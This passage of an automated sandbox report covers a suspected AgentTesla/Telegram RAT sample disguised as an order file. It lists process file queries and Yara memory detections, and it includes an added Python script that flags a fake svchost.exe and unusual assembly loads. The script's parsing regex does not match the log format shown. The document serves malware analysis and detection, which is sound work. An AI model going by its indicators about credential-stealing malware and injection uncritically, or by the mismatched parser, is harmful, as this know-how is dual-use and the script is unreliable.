                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Queries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Queries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Queries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe, Queries volume information: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe, Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe, Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
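
The volume-information block above is a compact record of which processes the sample ran and which images they touched, and two of its patterns can be checked mechanically: a binary carrying a Windows system name (svchost.exe) executing from C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\ rather than from System32 or SysWOW64, and a process with a native system name loading managed assemblies from the GAC (Microsoft.VisualBasic, System.Windows.Forms). The script below is added here as an example; it is not part of the report or of the sandbox vendor's tooling. It parses a few event lines copied from the block and applies those checks. The expected-directory table, the list of assemblies treated as unusual for a console-only .NET tool such as aspnet_regbrowsers.exe, and the finding codes are the example's own assumptions.

```python
"""Spot system-binary masquerading and odd assembly loads in the sandbox's
'Queries volume information' events.

Added example, not part of the report or of the sandbox vendor's tooling. The
sample lines are copied from the report; the rule tables are assumptions."""
import ntpath
import re
from collections import defaultdict

# Constructed sample input: seven event lines copied verbatim from the report
# (the extraction fused the process path and the 'Queries ...' field).
SAMPLE_EVENTS = r"""
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
"""

# The process path runs straight into 'Queries' in the extracted text, so the
# regex anchors on the '.exe' that is immediately followed by that keyword.
EVENT_RE = re.compile(
    r"^Source: (?P<proc>.+?\.exe)Queries volume information: "
    r"(?P<target>.+?) VolumeInformation$"
)

# Assumption: where a binary with this name is allowed to live on a clean host.
SYSTEM_BINARY_DIRS = {
    "svchost.exe": {r"c:\windows\system32", r"c:\windows\syswow64"},
}
# Assumption: console-only .NET tools that are popular hollowing targets.
CONSOLE_NET_TOOLS = {"aspnet_regbrowsers.exe"}
# Assumption: assemblies a console tool has no business loading.
UNEXPECTED_FOR_CONSOLE = {"system.windows.forms.dll", "microsoft.visualbasic.dll"}
GAC_MARKER = r"\microsoft.net\assembly\gac_"


def parse_events(text):
    """Return (process_path, target_path) pairs for every parsable line."""
    events = []
    for line in text.splitlines():
        m = EVENT_RE.match(line.strip())
        if m:
            events.append((m.group("proc"), m.group("target")))
    return events


def check_process(proc, targets):
    """Apply the three rules to one process and the paths it queried."""
    findings = []
    name = ntpath.basename(proc).lower()
    directory = ntpath.dirname(proc).lower()
    managed = sorted({ntpath.basename(t) for t in targets if GAC_MARKER in t.lower()})

    # Rule 1: a Windows system binary name running from an unexpected directory.
    if name in SYSTEM_BINARY_DIRS and directory not in SYSTEM_BINARY_DIRS[name]:
        findings.append(("masquerading_system_binary", directory))
    # Rule 2: a native system binary name touching CLR assemblies in the GAC.
    if name in SYSTEM_BINARY_DIRS and managed:
        findings.append(("native_name_loads_managed_assemblies", managed))
    # Rule 3 (heuristic): a console .NET tool pulling in GUI/VB assemblies.
    if name in CONSOLE_NET_TOOLS:
        odd = [a for a in managed if a.lower() in UNEXPECTED_FOR_CONSOLE]
        if odd:
            findings.append(("unexpected_assemblies_for_console_tool", odd))
    return findings


def analyze(text):
    """Group events by process and return {process_path: [findings]}."""
    by_proc = defaultdict(list)
    for proc, target in parse_events(text):
        by_proc[proc].append(target)
    return {proc: check_process(proc, targets) for proc, targets in by_proc.items()}


if __name__ == "__main__":
    for proc, findings in analyze(SAMPLE_EVENTS).items():
        status = "SUSPICIOUS" if findings else "ok"
        print(f"{status:10} {proc}")
        for code, detail in findings:
            print(f"           - {code}: {detail}")
```

Rules 1 and 2 are robust on their own: a file named svchost.exe outside System32/SysWOW64, or any svchost.exe pulling CLR assemblies out of the GAC, has no benign explanation on a stock Windows install. Rule 3 is a heuristic and should be read together with the report's "Writes to foreign memory regions" and "Injects a PE file into a foreign processes" signatures: aspnet_regbrowsers.exe is a legitimate command-line tool at its genuine path, and it is the injected payload, not the host, that drags in System.Windows.Forms. Baseline the assembly list on your own fleet before alerting on it.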

                      Stealing of Sensitive Information:

                      Yara detected Telegram RAT
                      Source: Yara match, File source: 0.2.#NEW ORDER FOR JANUARY 2022.exe.4416ba0.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 0.2.#NEW ORDER FOR JANUARY 2022.exe.4305940.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 0000003B.00000002.938179182.0000000002471000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match, File source: 00000020.00000002.778887336.00000000046B1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match, File source: 0000001F.00000002.755508340.00000000034D1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match, File source: 00000038.00000002.938786458.0000000003511000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match, File source: 00000025.00000002.939713877.0000000002F11000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match, File source: 00000029.00000002.911408277.000000000413D000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match, File source: 00000034.00000002.938600597.0000000002C41000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match, File source: 0000002F.00000002.937902584.0000000002D61000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match, File source: 00000026.00000002.871462494.00000000038F1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match, File source: 00000020.00000002.775543622.00000000043E1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match, File source: 00000030.00000002.927142303.000000000478D000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match, File source: 00000024.00000002.828856160.00000000047BC000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match, File source: 00000000.00000002.734755598.0000000004305000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match, File source: Process Memory Space: #NEW ORDER FOR JANUARY 2022.exe PID: 6588, type: MEMORYSTR
                      Source: Yara match, File source: Process Memory Space: aspnet_regbrowsers.exe PID: 7068, type: MEMORYSTR
                      Source: Yara match, File source: Process Memory Space: svchost.exe PID: 4876, type: MEMORYSTR
                      Source: Yara match, File source: Process Memory Space: svchost.exe PID: 6712, type: MEMORYSTR
                      Source: Yara match, File source: Process Memory Space: aspnet_regbrowsers.exe PID: 4588, type: MEMORYSTR
                      Yara detected AgentTesla
                      Source: Yara match, File source: 0.2.#NEW ORDER FOR JANUARY 2022.exe.42c5920.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 32.2.svchost.exe.470db20.2.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 31.0.aspnet_regbrowsers.exe.400000.1.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 37.2.aspnet_regbrowsers.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 0.2.#NEW ORDER FOR JANUARY 2022.exe.42a5900.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 31.0.aspnet_regbrowsers.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 32.2.svchost.exe.46edb00.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 37.0.aspnet_regbrowsers.exe.400000.2.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 31.0.aspnet_regbrowsers.exe.400000.4.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 31.0.aspnet_regbrowsers.exe.400000.2.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 0.2.#NEW ORDER FOR JANUARY 2022.exe.42c5920.2.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 37.0.aspnet_regbrowsers.exe.400000.3.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 31.0.aspnet_regbrowsers.exe.400000.3.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 36.2.svchost.exe.4aadb00.1.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 36.2.svchost.exe.4aedb20.2.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 31.2.aspnet_regbrowsers.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 37.0.aspnet_regbrowsers.exe.400000.1.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 37.0.aspnet_regbrowsers.exe.400000.4.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 0.2.#NEW ORDER FOR JANUARY 2022.exe.4305940.5.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 32.2.svchost.exe.474db40.3.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 36.2.svchost.exe.4aadb00.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 37.0.aspnet_regbrowsers.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 32.2.svchost.exe.470db20.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 36.2.svchost.exe.4aedb20.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 32.2.svchost.exe.474db40.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 0.2.#NEW ORDER FOR JANUARY 2022.exe.4416ba0.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 0.2.#NEW ORDER FOR JANUARY 2022.exe.4305940.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 0000003B.00000000.888165359.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match, File source: 0000001F.00000000.710933564.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match, File source: 00000025.00000000.745218195.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match, File source: 0000002F.00000000.788423328.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match, File source: 00000025.00000000.744599446.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match, File source: 0000001F.00000000.710472370.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match, File source: 0000002F.00000002.931530989.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match, File source: 0000002F.00000000.784941162.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match, File source: 0000002F.00000000.790295907.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match, File source: 00000020.00000002.778887336.00000000046B1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match, File source: 00000025.00000000.744014270.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match, File source: 0000001F.00000000.710080019.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match, File source: 00000034.00000000.817068526.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match, File source: 0000002F.00000000.786765310.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match, File source: 0000001F.00000000.709643389.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match, File source: 0000003B.00000000.890224140.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match, File source: 0000003B.00000000.885768767.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match, File source: 00000025.00000002.931661414.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match, File source: 00000025.00000000.746142761.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match, File source: 00000020.00000002.779987071.000000000474D000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match, File source: 00000024.00000002.842251291.0000000004AED000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match, File source: 00000030.00000002.927080316.0000000004715000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match, File source: 00000038.00000000.845760653.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match, File source: 0000003B.00000000.883261997.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match, File source: 0000003B.00000002.932852897.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match, File source: 00000034.00000000.814526101.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match, File source: 00000038.00000000.843348334.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match, File source: 00000026.00000002.886344519.0000000003C5D000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match, File source: 00000038.00000000.847213598.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match, File source: 00000034.00000000.815839505.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match, File source: 00000000.00000002.734261757.000000000428D000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match, File source: 00000034.00000000.818834012.0000000000402000.00000040.00000001.sdmp, type: MEMORY
